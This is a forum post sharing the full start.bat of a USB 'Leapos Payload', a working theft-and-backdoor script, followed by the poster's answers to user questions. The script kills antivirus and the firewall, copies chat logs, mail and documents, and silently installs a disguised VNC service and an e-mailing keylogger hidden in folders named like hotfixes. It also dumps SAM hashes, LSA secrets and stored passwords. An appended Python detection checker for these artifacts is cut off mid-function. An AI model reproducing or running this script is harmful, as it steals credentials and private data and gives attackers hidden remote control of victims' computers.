Everything posted by Tmbomber

  1. Just wanted to get this out... This is my complete start.bat file. Aside from the one change I've made to go.vbs, all my modifications have been to this file. @ECHO off CD SYSTEM >NUL :: Finds the location of the flash partition and sets master variable. IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST y:\CONFIG\Drive_Location.cfg SET flshdrv=y: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST x:\CONFIG\Drive_Location.cfg SET flshdrv=x: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST w:\CONFIG\Drive_Location.cfg SET flshdrv=w: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST v:\CONFIG\Drive_Location.cfg SET flshdrv=v: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST u:\CONFIG\Drive_Location.cfg SET flshdrv=u: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST t:\CONFIG\Drive_Location.cfg SET flshdrv=t: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST s:\CONFIG\Drive_Location.cfg SET flshdrv=s: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST r:\CONFIG\Drive_Location.cfg SET flshdrv=r: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST q:\CONFIG\Drive_Location.cfg SET flshdrv=q: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST p:\CONFIG\Drive_Location.cfg SET flshdrv=p: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST o:\CONFIG\Drive_Location.cfg SET flshdrv=o: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST n:\CONFIG\Drive_Location.cfg SET flshdrv=n: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST m:\CONFIG\Drive_Location.cfg SET flshdrv=m: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST l:\CONFIG\Drive_Location.cfg SET flshdrv=l: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound 
IF EXIST k:\CONFIG\Drive_Location.cfg SET flshdrv=k: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST j:\CONFIG\Drive_Location.cfg SET flshdrv=j: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST i:\CONFIG\Drive_Location.cfg SET flshdrv=i: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST h:\CONFIG\Drive_Location.cfg SET flshdrv=h: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST g:\CONFIG\Drive_Location.cfg SET flshdrv=g: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST f:\CONFIG\Drive_Location.cfg SET flshdrv=f: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST e:\CONFIG\Drive_Location.cfg SET flshdrv=e: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST d:\CONFIG\Drive_Location.cfg SET flshdrv=d: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST c:\CONFIG\Drive_Location.cfg SET flshdrv=c: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST b:\CONFIG\Drive_Location.cfg SET flshdrv=b: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound GOTO END :FlshDrvFound :: Checks to see if the payload is disarmed IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm IF EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO End :SkipDisarm :: Checks to see if safety.txt is found on the root of your C:\ drive, if it is, the payload will not run by default IF NOT EXIST %flshdrv%\CONFIG\Safety_Check.cfg GOTO SkipSafetyCheck IF EXIST C:\safety.txt GOTO End :SkipSafetyCheck :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername%" SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET 
progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\") SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg" SET U3="%cd%" :: check for and restore any missing parts of the payload from the backup archive before every run IF NOT EXIST %config%\Auto_Restore.cfg GOTO SkipAutoRestore IF EXIST %config%\U3_Drive.cfg GOTO SkipAutoRestore copy ".\SYSTEM\Backup.rar" "C:\Backup_Safe.rar" %progdir%\rar.exe x -o+ -p[4369462e7651316962562d4c6931697676652e626d366d57503b287246] "C:\Backup_Safe.rar" ".\" del "C:\Backup_Safe.rar" :SkipAutoRestore :: Attempt to kill any running antivirus IF NOT EXIST %config%\Run_AVKILL.cfg GOTO SkipAVKILL start .\HideConsole.exe .\csrss.bat :SkipAVKILL :: Disable the Windows firewall IF NOT EXIST %config%\Disable_Firewall.cfg GOTO SkipFirewall net stop "security center" netsh firewall set opmode disable :SkipFirewall IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" :: MSN Received Files and chatlogs mkdir %logdir%\Slurp_Data\MSN\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o :: Skype Received Files mkdir %logdir%\Slurp_Data\SkypeReceivedFiles\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Skype Received Files\*" "%logdir%\Slurp_Data\SkypeReceivedFiles\*" /i /o :: Skype Contacts mkdir %logdir%\Slurp_Data\SkypeContacts\ fc.exe "C:\Documents and Settings\%username%\Application Data\Skype\*" "%logdir%\Slurp_Data\SkypeContacts\*" /i /o :: FireFox Data mkdir %logdir%\Slurp_Data\FireFox\ xcopy "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*" "%logdir%\Slurp_Data\FireFox\" /s /c /q /r /h /y :: ThunderBird Data mkdir %logdir%\Slurp_Data\ThunderBird\ fc.exe 
"C:\Documents and Settings\%username%\Application Data\Thunderbird\Profiles\*" "%logdir%\Slurp_Data\ThunderBird\*" /i /o :: Internet Explorer Data mkdir %logdir%\Slurp_Data\IExplorer\ xcopy "C:\Documents and Settings\%username%\Application Data\Microsoft\Address Book\*.wab" "%logdir%\Slurp_Data\IExplorer\" /s /c /q /r /h /y fc.exe "C:\Documents and Settings\%username%\Favorites\*" "%logdir%\Slurp_Data\IExplorer\*" /i /o :: Outlook & Outlook Express Data mkdir %logdir%%\Slurp_Data\Outlook\ xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Microsoft\Outlook\*" "%logdir%\Slurp_Data\Outlook\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Identities\*" %logdir%\Slurp_Data\Outlook /s/c/q/r/h/y :: NetScape Data mkdir %logdir%\Slurp_Data\NetScape\ xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y :: Opera Data mkdir %logdir%\Slurp_Data\Opera\ xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y :: Trilian Data mkdir %logdir%\Slurp_Data\Trilian\ xcopy "%progfiles%\Trillian\users\default\logs\*.log" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y fc.exe "%progfiles%\Trillian\users\default\downloads\*" "%logdir%\Slurp_Data\Trilian\*" /i /o xcopy "%progfiles%\Trillian\users\default\*.ini" 
"%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y :: Yahoo Messenger Data mkdir %logdir%\Slurp_Data\Yahoo.M\ fc.exe "%progfiles%\Yahoo!\Messenger\Profiles\*" "%logdir%\Slurp_Data\Yahoo.M\" /i /o :: Miranda IM Data mkdir %logdir%\Slurp_Data\Miranda\ xcopy "%progfiles%\Miranda IM\*.dat" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y xcopy "%progfiles%\Miranda IM\*.bmp" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y :: Gaim Data mkdir %logdir%\Slurp_Data\Gaim\ xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.txt" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.xml" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y :: ICQ Lite mkdir %logdir%\Slurp_Data\ICQ\ fc.exe "C:\Documents and Settings\%username%\My Documents\ICQ Lite\*" "%logdir%\Slurp_Data\ICQ\*" /i /o IF EXIST %config%\Slurp2.cfg GOTO StartSlurp2 REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp1 IF NOT EXIST %config%\Slurp2.cfg GOTO SkipSlurp2 :StartSlurp2 :: My Documents files mkdir %logdir%\Slurp_Data\MyDocuments\ fc.exe "C:\Documents and Settings\%username%\My Documents\*" "%logdir%\Slurp_Data\MyDocuments\*" /i /o :: Desktop files mkdir %logdir%\Slurp_Data\Desktop\ fc.exe "C:\Documents and Settings\%username%\Desktop\*" "%logdir%\Slurp_Data\Desktop\*" /i /o :: All Users Desktop files mkdir %logdir%\Slurp_Data\SharedDesktop\ fc.exe "C:\Documents and Settings\All Users\Desktop\*" "%logdir%\Slurp_Data\SharedDesktop\*" /i /o :: All Users Documents files mkdir %logdir%\Slurp_Data\SharedDocuments\ fc.exe "C:\Documents and Settings\All Users\Shared Documents\*" "%logdir%\Slurp_Data\SharedDocuments\*" /i /o REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp2 :: Header information ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1 ECHO 
----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1 IF NOT EXIST %config%\System_Info.cfg GOTO SkipSysInfo ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [System info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IPCONFIG /all >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [C:\ Tree Listing] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 tree /A C:\ >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [File Type Associations] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 assoc >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Driver Info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 driverquery >> %log% 2>&1 :SkipSysInfo IF NOT EXIST %config%\External_IP.cfg GOTO SkipExtIP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [External IP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\wget.exe %eipurl% --output-document=%tmplog% 2>&1 
ECHO. >> %tmplog% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipExtIP IF NOT EXIST %config%\VNC.cfg GOTO SkipVNC ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [VNC] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO VNC was installed silently >> %log% 2>&1 ECHO Password is either "easy" "hacked" or "yougothacked". I'm not sure what it's set to >> %log% 2>&1 XCOPY "%installdir%\VNC\VNCHOOKS.DLL" "%systemroot%" /c /y XCOPY "%installdir%\VNC\WINVNC.EXE" "%systemroot%" /c /y SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1 SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 
2>&1 REGEDIT /s %installdir%\VNC\vnc.reg 2>&1 NET START WinVNC 2>&1 :SkipVNC IF NOT EXIST %config%\Haksaw.cfg GOTO SkipHaksaw ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [HakSaw] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO HakSaw was installed silently >> %log% 2>&1 MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1 XCOPY %installdir%\HAKSAW\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY %installdir%\HAKSAW\*.* "%appdata%\sbs" /y 2>&1 XCOPY %progdir%\RAR.EXE "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY %progdir%\RAR.EXE "%appdata%\sbs" /y 2>&1 REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1 COPY "%installdir%\HAKSAW\Send_Partial.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY "%installdir%\HAKSAW\Send_Partial.bat"+%config%\Email_Config.cfg" "%appdata%\sbs\send.bat" 2>&1 COPY %config%\Stunnle_Config.cfg "%systemroot%\$NtUninstallKB931337$\stunnel.conf" || COPY %config%\Stunnle_Config.cfg "%appdata%\sbs\stunnel.conf" 2>&1 ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1 %installdir%\HAKSAW\SBS.lnk & %installdir%\HAKSAW\SBS2.lnk :SkipHaksaw IF NOT EXIST %config%\Keyloger.cfg GOTO SkipKeylog ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Keyloger] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO Keyloger was installed 
silently. Logs will be e-mailed to you. >> %log% 2>&1 IF EXIST %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO SkipKeylog IF EXIST %appdata%\klgr\winlogon.exe GOTO SkipKeylog MKDIR %systemroot%\$NtUninstallKB931552$ || MKDIR "%appdata%\klgr" attrib %progdir%\KEYLOG\*.* -s -h COPY %progdir%\KEYLOG\*.* %systemroot%\$NtUninstallKB931552$ || copy %progdir%\KEYLOG\*.* "%appdata%\klgr" COPY "%installdir%\KEYLOG\Send.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB931552$\Recover.bat" || COPY "%installdir%\KEYLOG\send.bat"+%config%\Email_Config.cfg" "%appdata%\klgr\Recover.bat" 2>&1 COPY %config%\Stunnle_Config.cfg %systemroot%\$NtUninstallKB931552$\Stunnle.cfg || copy %config%\Stunnle_Config.cfg "%appdata%\klgr\Stunnle.cfg" XCOPY %progdir%\RAR.EXE "%systemroot%\$NtUninstallKB931552$\" /y || XCOPY %progdir%\RAR.EXE "%appdata%\klgr" /y 2>&1 regedit /s %progdir%\KEYLOG\Install.key || "%appdata%\klgr\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\klgr\winlogon.exe" /W:"%appdata%\klgr" /I:"%appdata%\klgr\blank.ico" attrib %systemroot%\$NtUninstallKB931552$ +s +h & attrib "%appdata%\klgr" +s +h IF EXIST %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO KeylogAdminRights at 17:00 cmd /every:M,T,W,Th,F %appdata%\klgr\Recover.bat GOTO SkipKeyLog :KeylogAdminRights at 17:00 cmd /every:M,T,W,Th,F %systemroot%\$NtUninstallKB931552$\Recover.bat :SkipKeylog IF NOT EXIST %config%\Install_NMAP.cfg GOTO SkipNMAP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [NMAP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO NMAP was installed silently. Port Scan will be e-mailed to you. 
>> %log% 2>&1 MKDIR %systemroot%\$NtUninstallKB91338$ || mkdir "%appdata%\scs" attrib %installdir%\NMAP*.* -s -h COPY %installdir%\NMAP*.* %systemroot%\$NtUninstallKB91338$ || copy *.* "%appdata%\scs" COPY "%installdir%\NMAP\Send_partial.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB91338\Send.bat" || COPY "%installdir%\KEYLOG\send_partial.bat"+%config%\Email_Config.cfg" "%appdata%\scs\Send.bat" 2>&1 COPY %config%\Stunnle_Config.cfg %systemroot%\$NtUninstallKB91338$\Stunnle.cfg || copy %config%\Stunnle_Config.cfg "%appdata%\scs\Stunnle.cfg" attrib %systemroot%\$NtUninstallKB91338$ +s +h & attrib "%appdata%\scs" +s +h "%progdir%\HideConsole.exe" "%systemroot%\$NtUninstallKB91338$\nmap.bat" :SkipNMAP IF NOT EXIST %config%\Dump_Wifi_Hex.cfg GOTO SkipDumpWifi ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Wifi Hex] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\wifike.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipDumpWifi IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IF EXIST "C:\Program Files (x86)" GOTO PWD1 .\pwdump 127.0.0.1 >> %log% 2>&1 GOTO SkipPWDUMP :PWD1 .\pwdump -x 127.0.0.1 >> %log% 2>&1 :SkipPWDUMP IF NOT EXIST %config%\Dump_SAM_FGDUMP.cfg GOTO SkipFGDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO 
+----------------------------------+ >> %log% 2>&1 CD /D %logdir% >> %log% 2>&1 %U3%\fgdump.exe -vv -c >> %log% 2>&1 CD /D %U3% >> %log% 2>&1 ECHO. >> %log% 2>&1 ECHO -----Hashes----- >> %log% 2>&1 ECHO. >> %log% 2>&1 COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL DEL /f /q %logdir%\*.log >> %log% 2>&1 DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1 DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1 :SkipFGDUMP IF NOT EXIST %config%\Dump_Network_PW.cfg GOTO SkipNetPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Network PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\netpass.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >>NUL :SkipNetPW IF NOT EXIST %config%\Dump_Mail_PW.cfg GOTO SkipMailPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Mail PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\mailpv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipMailPW IF NOT EXIST %config%\Dump_Firefox_PW.cfg GOTO SkipFirefoxPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Echo +----------------------------------+ >> %log% 2>&1 Echo + [Dump Firefox PW] + >> %log% 2>&1 Echo +----------------------------------+ >> %log% 2>&1 %progdir%\FirePassword.exe >> %log% 2>&1 :SkipFirefoxPW IF NOT EXIST %config%\Dump_IE_PW.cfg GOTO SkipIEPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> 
%log% 2>&1 ECHO + [Dump IE PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\iepv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipIEPW IF NOT EXIST %config%\Dump_Messenger_PW.cfg GOTO SkipMessPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Messenger PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\mspass.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipMessPW IF NOT EXIST %config%\Dump_Cache.cfg GOTO SkipCacheDump ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Cache] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\cachedump.exe -v >> %log% 2>&1 :SkipCacheDump IF NOT EXIST %config%\Dump_LSA_Secrets.cfg GOTO SkipLSA ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump LSA secrets] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\pspv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipLSA IF NOT EXIST %config%\Dump_Product_Keys.cfg GOTO SkipKeyDump ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Product Keys] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 
2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipKeyDump IF NOT EXIST %config%\Dump_URL_History.cfg GOTO SkipURLHist ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump URL History] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1 :SkipURLHist IF NOT EXIST %config%\Dump_Update_List.cfg GOTO SkipUdateList ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Updates-List] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\wul.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipUdateList IF NOT EXIST %config%\Network_Services.cfg GOTO SkipNetServices ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Network Services] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 netstat.exe -abn >> %log% 2>&1 :SkipNetServices IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Port Scan] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\portqry -local -v -v >> %log% 2>&1 :SkipPortScan ECHO. 
>> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 :: Just to make sure the temp log is removed after everything has finished. DEL /f /q %tmplog% >NUL :: Opens the logs folder IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv start /wait %flshdrv%\LOGS\ :SkipOpenDrv :: Opens the root of the drive folder IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt start /wait %flshdrv% :SkipOpenDrvRt :End EXIT

In answer to questions asked...

NMAP??? Unfortunately I haven't even turned NMAP on yet, so no NMAP output to look at. I don't think that'll work seeing NMAP is an option that won't be turned on all the time.

AutoIT??? It's easier to take something that's partly working and fix it than it is to chuck it and re-write it in another language. If you have an AutoIT version written by all means post it. I'd be happy to take a look at it.

As to parse errors, please provide details as to what you're doing and what you're seeing. I've run this payload on multiple machines and operating systems. Almost *all* of the "dump" information is being reported. I'm still having a few issues with the "slurp" data (the stuff in c:\Program files, to be specific) but most everything else is working. It seems to me that parse errors are indicating an incorrectly created USB stick. I use Gonzor's Universal Customizer with SanDisk thumb drives. How are you creating your thumb drive image? How are you flashing it?

And Thank You Jen for the information on Vista. (so it looks just like XP... wonderful :( )
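An added example, not code from the post or from the payload's author: an offline triage check that flags the persistence artifacts this start.bat leaves on a host (the $NtUninstallKB...$ drop folders and their sbs/klgr/scs fallbacks under Application Data, the USBMedia Run value, the blank-named " .lnk" startup shortcut, the WinVNC service registered as "Domain Client Service", and the 17:00 AT job that runs Recover.bat). It is written in Python so it runs here against a constructed inventory; on a real XP/2000 box the same inventory would be collected with dir /a, reg query, sc qc and at.

```python
"""Triage check for the persistence artifacts left by the start.bat payload above
(added example, not code from the post; artifact names come from the post, the
host inventory below is constructed sample data)."""
from typing import Dict, List, Tuple

# Hidden drop folders under %systemroot% that mimic hotfix uninstall dirs, and the
# per-user fallbacks under Application Data used when the account is not an admin.
DROP_DIRS = ("$NtUninstallKB931337$", "$NtUninstallKB931552$", "$NtUninstallKB91338$")
APPDATA_DROP_DIRS = ("sbs", "klgr", "scs")
DROPPED_FILES = {"winvnc.exe", "vnchooks.dll", "rar.exe", "sbs.exe", "winlogon.exe",
                 "stunnel.conf", "stunnle.cfg", "send.bat", "recover.bat", "nmap.bat",
                 "shortcut.exe", "blank.ico"}
RUN_VALUE_NAME = "USBMedia"                 # Run value the payload adds under HKLM
VNC_DISPLAY_NAME = "Domain Client Service"  # cover name given to the WinVNC service

Finding = Tuple[str, str]  # (category, detail)


def _leaf(path: str) -> str:
    """Last path component, case preserved."""
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def check_dirs(listing: Dict[str, List[str]]) -> List[Finding]:
    """listing maps a directory path to the names of the files it contains."""
    findings: List[Finding] = []
    for path, files in listing.items():
        leaf, lower = _leaf(path), [f.lower() for f in files]
        dropped = sorted(f for f in files if f.lower() in DROPPED_FILES)
        in_appdata = "\\application data\\" in path.lower()
        if leaf in DROP_DIRS:
            findings.append(("drop_dir", f"known payload folder {path}"))
        elif (leaf.startswith("$NtUninstall")
              or (in_appdata and leaf.lower() in APPDATA_DROP_DIRS)) and dropped:
            # A genuine hotfix uninstall folder holds backed-up system files and
            # spuninst\, not a VNC server, rar.exe or a mail-sender batch file.
            findings.append(("drop_dir", f"{path} holds payload tools: {', '.join(dropped)}"))
        # The keylogger binary is named winlogon.exe; the real one lives only in system32.
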